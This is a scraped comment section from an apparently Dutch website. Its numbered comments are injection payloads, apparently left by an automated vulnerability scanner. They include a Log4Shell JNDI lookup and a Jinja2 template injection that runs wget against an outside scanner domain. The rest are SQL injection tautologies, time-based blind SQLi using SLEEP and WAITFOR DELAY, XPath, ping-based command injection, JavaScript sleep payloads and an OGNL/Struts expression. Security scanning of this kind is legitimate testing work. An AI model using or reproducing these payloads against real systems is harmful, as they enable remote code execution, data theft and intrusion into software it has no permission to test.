    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://d641aabe9f5be2f3f07b7d895b2b95b4792bd56c.1768425210231792.319058485.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  194. 1
    | Beantwoorden

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://75f800f60f32f31dec080ac2ac2f16b9b54324dc.1768425210231792.2692207719.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}

  195. 1
    | Beantwoorden

    1′) or 2634=2634 —

  196. 1
    | Beantwoorden

    1′ or 3789=3789 —

  197. 1
    | Beantwoorden

    1 or 4325=4325 —

  198. 1
    | Beantwoorden

    1 or NULL IS NULL

  199. 1
    | Beantwoorden

    1 and NULL IS NULL

  200. 1
    | Beantwoorden

    1′) or ‘swqtp’=’swqtp

  201. 1
    | Beantwoorden

    1′ or ’tpklq’=’tpklq

  202. 1
    | Beantwoorden

    11 or 11=11

  203. 1
    | Beantwoorden

    1′ or true() or ‘and’ = ‘and

  204. 1
    | Beantwoorden

    1 or true() or ‘and’ = ‘and’

  205. 1
    | Beantwoorden

    1″ or true() or “and” = “and

  206. 1
    | Beantwoorden

    aaaa&ping -n 92 localhost&

  207. 1
    | Beantwoorden

    ping -c2 -i91 localhost

  208. 1
    | Beantwoorden

    |ping -c2 -i56 localhost

  209. 1
    | Beantwoorden

    |ping -c2 -i91 localhost|

  210. 1
    | Beantwoorden

    1WAITFOR DELAY ’00:00:29′

  211. 1
    | Beantwoorden

    1;WAITFOR DELAY ’00:00:29′;

  212. 1
    | Beantwoorden

    1);WAITFOR DELAY ’00:00:29′–

  213. 1
    | Beantwoorden

    1′;WAITFOR DELAY ’00:00:29′–

  214. 1
    | Beantwoorden

    1′);WAITFOR DELAY ’00:00:29′–

  215. 1
    | Beantwoorden

    1′,0,0);WAITFOR DELAY’00:00:29′–

  216. 1
    | Beantwoorden

    1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)

  217. 1
    | Beantwoorden

    1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘

  218. 1
    | Beantwoorden

    1;SELECT sleep(29); —

  219. 1
    | Beantwoorden

    1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/

  220. 1
    | Beantwoorden

    1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime

  221. 1
    | Beantwoorden

    1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys

  222. 1
    | Beantwoorden

    1′; var djci=sleep(29*1000);//

  223. 1
    | Beantwoorden

    1′; var djci=sleep(29*1000) + ‘

  224. 1
    | Beantwoorden

    1′ + sleep(29*100*Math.sqrt(100)) + ‘

  225. 1
    | Beantwoorden

    1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))

Geef een reactie

Je e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *